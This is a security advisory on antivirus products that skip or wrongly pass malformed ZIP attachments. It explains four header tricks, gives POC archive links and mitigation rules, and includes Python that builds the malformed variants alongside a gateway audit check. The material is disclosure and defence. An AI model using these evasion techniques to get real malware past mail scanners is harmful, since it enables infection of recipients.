There has been a lot of noise and confusion regarding all the issues reported lately, so let me sum them up.

___________________________________________________________________________________

Multiple Vendor Antivirus Products Malformed ZIP Attachment Scan Evasion Vulnerability

Affected Products:

  mks_vir
  BitDefender 7.0
  AntiVir
  DrWeb 4.32b
  eTrust-Iris 7.1.194.0
  Fortinet 2.51
  eTrust-Vet 11.7.0.0
  McAfee 4445
  Norman 5.70.10
  Sybari 7.5.1314
  Symantec 8.0
  F-Prot 3.16a
  Kaspersky

(Updated March 16, 2005 6:00 GMT)

Mitigation:

For the time being, set filter rules in your AV/email gateway to filter out archives that embed executables (exe, com, pif, scr, cpl etc.). Block every kind of broken archive, and every archive that contains password-protected entries.

Description:

1). If you create a zip archive with an invalid CRC checksum, some AV skip the archive and mark it as clean. This way you can bypass antivirus gateways and slip in any attachment without the archive being scanned. Moreover, these days software tools automatically repair a "broken" archive, so the attachment still extracts for the recipient.

POC: http://www.geocities.com/visitbipin/crc.zip

2). If, in the local file header, you overwrite the "general purpose bit flag" (the 7th and 8th bytes of the header) with \x2f, some AV skip the file and mark it as clean. Bit 0 of that flag is the encryption bit, and \x2f has it set, so the AV comes to the false assumption that the entry is encrypted. This was discovered during the analysis of "Multiple AV Vendor Incorrect CRC32 Bypass Vulnerability."

POC: http://www.geocities.com/visitbipin/gpbf.zip

3). If you have a long archive comment in a zip archive, these AV can't detect a virus embedded in it. I came to know that Symantec 8.1 is immune to this bug(?).

POC: http://www.geocities.com/visitbipin/long_coment.zip

4). If, in the local file header and data descriptor, you change the compressed size and uncompressed size to values greater than the actual file size, many AV can't scan the file properly.
POC: http://www.geocities.com/visitbipin/Antigen.zip <--- try it

Moreover, there are unzip utilities that go into a loop if the file size is changed to ffffffff! Let's hope the less popular AV/trojan scanners out there don't have such faulty code!

Unzip utilities will successfully extract such an archive, with some garbage data (\x00 bytes, 255 of them) appended at the end (forge the CRC correctly first). The garbage data doesn't matter that much, because malicious code executes without any problem with garbage at its end. This will successfully bypass AV detection even for known malicious code, "MOST OF THE TIME", if the AV detects the executable by comparing the checksum of the whole file instead of analysing a particular chunk of code in the code's body. I think this is true for some of those old little (few-byte) viruses. But modern AV engines in most cases don't depend on such a primitive technique to detect a virus, so it shouldn't be that big an issue.

5). A fifth issue, which I am feeling too lazy to type up/describe now. Have a look at http://www.securityfocus.com/archive/1/393291

Be noted: http://www.geocities.com/visitbipin/test_nav.zip contains a self-extracting archive that will extract the POC named *.eicar.zip. It is better to extract it from the exe archive, as there are some AV out there that can't even scan an infected file embedded in a self-extracting zip archive! (O;

The names of vulnerable products were gathered from feedback on the Full-disclosure mailing list and from private discussion with others, and are believed to be true. You can run the files through www.virustotal.com, http://virusscan.jotti.org/ or http://sandbox.norman.no/live_4.html and you'll see what I'm talking about. Though I understand they might be using the CLI engine in most cases (if not all), while there are other functionalities in a full AV package that are not in the CLI-based engine. Thanks to Pedro Bustamante for pointing this out.
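The four header manipulations above (bad CRC, fake encryption flag, long archive comment, oversized declared sizes), plus the check a gateway should run before it ever calls an archive clean, as an added example in Python. This is not code from the advisory, from the POC files, or from any of the listed products. It assumes a single-entry STORED archive written by the standard library (so the first local file header sits at offset 0 and the central directory offset comes from the end-of-central-directory record), a constructed harmless payload named "invoice.exe" in place of a real attachment, and a hypothetical gateway policy limit MAX_COMMENT of 1024 bytes on the archive comment. The "encrypted" variant only sets the flag bit, mirroring the advisory's trick; nothing is actually encrypted.

```python
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"
EOCD_SIG = b"PK\x05\x06"
LOCAL_FMT = "<4sHHHHHIIIHH"   # 30-byte local file header (PKWARE APPNOTE)
MAX_COMMENT = 1024            # hypothetical gateway policy: longer comments are suspect

# Constructed, harmless stand-in for an attachment (not EICAR, not a real PE).
NAME = "invoice.exe"
PAYLOAD = b"constructed harmless bytes standing in for an executable\n"


def build_zip(comment=b""):
    """Single-entry STORED archive written by the stdlib, so every offset is known."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr(NAME, PAYLOAD)
        zf.comment = comment
    return buf.getvalue()


def _patch(buf, offset, fmt, value):
    """Overwrite one little-endian field in an immutable bytes object."""
    return buf[:offset] + struct.pack(fmt, value) + buf[offset + struct.calcsize(fmt):]


def _central_dir(buf):
    """Offset of the central directory, read from the end-of-central-directory record."""
    return struct.unpack_from("<I", buf, buf.rfind(EOCD_SIG) + 16)[0]


# Items 1, 2 and 4 applied to the first entry (local header at offset 0) and to
# its central directory copy, so an extractor trusting either copy sees the same values.
def bad_crc(buf):
    """Item 1: flip every bit of the CRC-32 so it no longer matches the data."""
    cd = _central_dir(buf)
    crc = struct.unpack_from("<I", buf, 14)[0] ^ 0xFFFFFFFF
    return _patch(_patch(buf, 14, "<I", crc), cd + 16, "<I", crc)


def fake_encrypted(buf):
    """Item 2: set bit 0 of the general purpose bit flag (the encryption bit,
    which the advisory's \\x2f value has set) without encrypting anything."""
    cd = _central_dir(buf)
    lflags = struct.unpack_from("<H", buf, 6)[0] | 0x0001
    cflags = struct.unpack_from("<H", buf, cd + 8)[0] | 0x0001
    return _patch(_patch(buf, 6, "<H", lflags), cd + 8, "<H", cflags)


def huge_sizes(buf):
    """Item 4: declare compressed and uncompressed sizes of 0xFFFFFFFF."""
    cd = _central_dir(buf)
    for off in (18, 22, cd + 20, cd + 24):
        buf = _patch(buf, off, "<I", 0xFFFFFFFF)
    return buf


def long_comment():
    """Item 3: a valid archive carrying the largest comment the 16-bit length field allows."""
    return build_zip(comment=b"A" * 0xFFFF)


def audit(buf):
    """Anomalies a gateway must treat as suspicious, never as 'clean'."""
    findings = []
    sig, _ver, flags, method, _t, _d, crc, csize, usize, nlen, xlen = \
        struct.unpack_from(LOCAL_FMT, buf, 0)
    if sig != LOCAL_SIG:
        return ["no local file header at offset 0"]
    if flags & 0x0001:
        findings.append("encryption flag set")
    start = 30 + nlen + xlen
    if start + csize > len(buf):
        findings.append("declared sizes run past end of archive")
    else:
        if method == 0 and csize != usize:
            findings.append("stored entry with compressed != uncompressed size")
        if zlib.crc32(buf[start:start + csize]) != crc:
            findings.append("crc mismatch")
    eocd = buf.rfind(EOCD_SIG)
    if eocd < 0:
        findings.append("no end-of-central-directory record")
        return findings
    clen = struct.unpack_from("<H", buf, eocd + 20)[0]
    if clen > MAX_COMMENT:
        findings.append("oversized archive comment")
    if eocd + 22 + clen != len(buf):
        findings.append("trailing data after archive comment")
    return findings


def should_quarantine(buf):
    """Fail closed: anything that does not parse cleanly is held, not passed as clean."""
    return bool(audit(buf))


def stdlib_accepts(buf):
    """Does Python's own zipfile extract the entry intact without complaint?"""
    try:
        with zipfile.ZipFile(io.BytesIO(buf)) as zf:
            return zf.read(NAME) == PAYLOAD
    except Exception:
        return False
```

The contrast worth noticing is between audit() and stdlib_accepts(): a strict extractor refuses the bad-CRC and fake-encrypted archives outright but is perfectly happy with the long-comment one, so the comment case cannot be caught by "does it parse" alone and needs an explicit policy limit. The bug the advisory describes is a scanner that, on any of these parse failures, answers "clean" instead of "quarantine".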
Another interesting link is Dr. Peter Bieringer's advisory: http://www.aerasec.de/security/index.html?id=ae-200503-020&lang=en

Useful reference: http://www.pkware.com/company/standards/appnote/

regards,
Bipin Gautam
http://www.geocities.com/visitbipin/

Disclaimer: The information in this advisory is believed to be accurate at the time of publication, based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage arising from use of, or reliance on, this information.